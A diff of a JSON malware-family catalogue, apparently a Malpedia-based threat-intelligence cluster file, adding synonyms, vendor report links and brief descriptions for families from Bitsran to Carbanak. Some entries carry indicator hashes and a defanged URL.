+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf"
+ ],
+ "synonyms": [
+ "SHADYCAT"
+ ],
+ "type": []
+ },
 "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc",
 "value": "Bitsran"
 },
@@ -5024,8 +9939,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
- "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan"
+ "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
 ],
 "synonyms": [],
 "type": []
@@ -5033,6 +9949,22 @@
 "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634",
 "value": "Bitter RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat",
+ "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
+ "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
+ "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md",
+ "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8c4363f4-4f38-4a5a-bc87-16f0721bd03b",
+ "value": "BitRAT"
+ },
 {
 "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.",
 "meta": {
@@ -5054,25 +9986,47 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee",
 "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
 "https://attack.mitre.org/software/S0069/",
+ "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
 "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
- "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1"
+ "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/"
+ ],
+ "synonyms": [
+ "PNGRAT",
+ "ZoxPNG",
+ "gresim"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899",
 "value": "BLACKCOFFEE"
 },
 {
- "description": "",
+ "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo \u201cremote desktop\u201d\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
 "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
+ "https://threatconnect.com/blog/casting-a-light-on-blackenergy/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html",
 "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
+ "https://securelist.com/black-ddos/36309/",
+ "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/",
+ "https://www.secureworks.com/research/blackenergy2",
 "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
- "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/"
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -5080,15 +10034,63 @@
 "uuid": "82c644ab-550a-4a83-9b35-d545f4719069",
 "value": "BlackEnergy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware",
+ "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html",
+ "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "246b6563-edd8-49c7-9d3c-97dc1aec6b81",
+ "value": "BlackKingdom Ransomware"
+ },
+ {
+ "description": "Advanced and modern Windows botnet with PHP panel developed using VB.NET",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat",
+ "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html",
+ "https://labs.k7computing.com/?p=21365",
+ "https://github.com/BlackHacker511/BlackNET/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/",
+ "https://github.com/FarisCode511/BlackNET/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "656c4009-cd79-4501-9fc9-7ad2d97b634c",
+ "value": "BlackNET RAT"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat",
+ "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "845ce966-fb40-4f12-b9c1-8b97263a589e",
+ "value": "BlackNix RAT"
+ },
 {
 "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
 ],
 "synonyms": [
 "Kaptoxa",
+ "MMon",
 "POSWDS",
 "Reedum"
 ],
@@ -5101,8 +10103,24 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution",
- "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/",
+ "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/"
+ ],
+ "synonyms": [
+ "BlackRAT"
+ ],
+ "type": []
+ },
+ "uuid": "b1302517-d5c9-44bb-833d-4396365915db",
+ "value": "BlackRemote"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution"
 ],
 "synonyms": [],
 "type": []
@@ -5126,6 +10144,20 @@
 "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79",
 "value": "BlackRouter"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby",
+ "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/",
+ "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "617d53dd-1143-4146-bbc0-39e975a26fe5",
+ "value": "Blackruby Ransomware"
+ },
 {
 "description": "",
 "meta": {
@@ -5133,6 +10165,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades",
 "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
 "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
 "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
 "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/"
 ],
@@ -5142,6 +10175,85 @@
 "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b",
 "value": "BlackShades"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksoul",
+ "https://quointelligence.eu/2021/01/reconhellcat-uses-nist-theme-as-lure-to-deliver-new-blacksoul-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "58701e4d-87aa-45a5-adfd-9b20f50fea91",
+ "value": "BlackSoul"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat",
+ "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html",
+ "https://github.com/BlackHacker511/BlackWorm",
+ "https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "02d2bb6d-9641-406e-9767-58aff2fad6c7",
+ "value": "Blackworm RAT"
+ },
+ {
+ "description": "According to SentinelOne, this RAT can gather and transmit a defined set of system features, create/terminate/manipulate processes and files, and has self-updating and deletion capability.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/",
+ "https://www.hvs-consulting.de/lazarus-report/",
+ "https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html"
+ ],
+ "synonyms": [
+ "DRATzarus RAT"
+ ],
+ "type": []
+ },
+ "uuid": "44d22b4e-5ad4-4f05-a421-95607706378d",
+ "value": "BLINDINGCAN"
+ },
+ {
+ "description": "BLINDTOAD is 64-bit Service DLL that loads an encrypted file from disk and executes it in memory.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad",
+ "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/",
+ "https://content.fireeye.com/apt/rpt-apt38"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b34fd401-9d37-4bc6-908f-448c1697f749",
+ "value": "BLINDTOAD"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether",
+ "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf"
+ ],
+ "synonyms": [
+ "CAPGELD"
+ ],
+ "type": []
+ },
+ "uuid": "cf542e2d-531c-4d34-98c8-7e3cb26a32af",
+ "value": "BLUETHER"
+ },
 {
 "description": "",
 "meta": {
@@ -5172,8 +10284,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek",
- "https://asert.arbornetworks.com/communications-bolek-trojan/",
- "http://www.cert.pl/news/11379"
+ "https://securelist.com/kbot-sometimes-they-come-back/96157/",
+ "http://www.cert.pl/news/11379",
+ "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt"
 ],
 "synonyms": [
 "KBOT"
@@ -5183,6 +10296,51 @@
 "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18",
 "value": "Bolek"
 },
+ {
+ "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate \u2018Dwrite.dll\u2019 provided by the Microsoft DirectX Typography Services. The application loads the \u2018gdi\u2019 library, which loads the \u2018gdiplus\u2019 library, which ultimately loads \u2018Dwrite\u2019. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite",
+ "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a24eb119-d526-4aa4-ab5f-171ccddd4fbc",
+ "value": "BOOSTWRITE"
+ },
+ {
+ "description": "BOOTWRECK is a master boot record wiper malware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/"
+ ],
+ "synonyms": [
+ "MBRkiller"
+ ],
+ "type": []
+ },
+ "uuid": "174b9314-765e-44d0-a761-10d352f4466c",
+ "value": "BOOTWRECK"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.borr",
+ "https://twitter.com/ViriBack/status/1222704498923032576",
+ "https://github.com/onek1lo/Borr-Stealer",
+ "https://telegra.ph/Borr-Malware-02-04"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e016e652-8d02-45c4-a268-fe4c588ebd3d",
+ "value": "Borr"
+ },
 {
 "description": "",
 "meta": {
@@ -5224,15 +10382,23 @@
 "value": "BRAIN"
 },
 {
- "description": "",
+ "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim\u2019s networks.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul",
 "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
+ "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
+ "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
+ ],
+ "synonyms": [
+ "SORRYBRUTE"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763",
@@ -5265,7 +10431,7 @@
 "value": "BreachRAT"
 },
 {
- "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
+ "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
@@ -5290,12 +10456,29 @@
 "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90",
 "value": "Bredolab"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler",
+ "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf"
+ ],
+ "synonyms": [
+ "down_new"
+ ],
+ "type": []
+ },
+ "uuid": "9a544700-13e3-490f-ae4e-45b3fd159546",
+ "value": "BROLER"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader",
- "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html"
+ "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html",
+ "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later",
+ "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/"
 ],
 "synonyms": [],
 "type": []
@@ -5322,6 +10505,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005",
 "https://github.com/nccgroup/Royal_APT",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
 ],
 "synonyms": [],
@@ -5357,17 +10541,46 @@
 "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66",
 "value": "BUBBLEWRAP"
 },
+ {
+ "description": "Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.minerva-labs.com/stopping-buerloader",
+ "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
+ "https://twitter.com/StopMalvertisin/status/1182505434231398401",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
+ "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://twitter.com/SophosLabs/status/1321844306970251265",
+ "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/"
+ ],
+ "synonyms": [
+ "Buerloader"
+ ],
+ "type": []
+ },
+ "uuid": "b908173c-c89e-400e-b69d-da411120dae2",
+ "value": "Buer"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045f"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": "16794655-c0e2-4510-9169-f862df104045",
- "value": "Bugat"
+ "uuid": "eca37457-cdd4-44c7-ad07-7a4a863e8765",
+ "value": "BUFFETLINE"
 },
 {
 "description": "",
@@ -5377,9 +10590,15 @@
 "https://malware-research.org/carbanak-source-code-leaked/",
 "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack",
 "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
+ "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/",
+ "https://www.scythe.io/library/threatthursday-buhtrap",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
 "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
- "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/",
- "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/"
+ "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code",
+ "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
+ "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/"
 ],
 "synonyms": [
 "Ratopak"
@@ -5394,7 +10613,6 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner",
- "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html",
 "https://www.f-secure.com/weblog/archives/00002249.html",
 "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf"
 ],
@@ -5460,7 +10678,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/"
 ],
 "synonyms": [],
 "type": []
@@ -5497,7 +10719,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
+ "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets"
 ],
 "synonyms": [
 "Cadelle"
@@ -5507,6 +10730,21 @@
 "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66",
 "value": "CadelSpy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn",
+ "https://www.youtube.com/watch?v=3cUWjojQXWE",
+ "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "https://twitter.com/8th_grey_owl/status/1357550261963689985"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "52c0b49b-d57e-400d-8808-a00d4171ac05",
+ "value": "CALMTHORN"
+ },
 {
 "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.",
 "meta": {
@@ -5552,10 +10790,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html",
+ "https://threatintel.blog/OPBlueRaven-Part1/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
+ "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
 "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
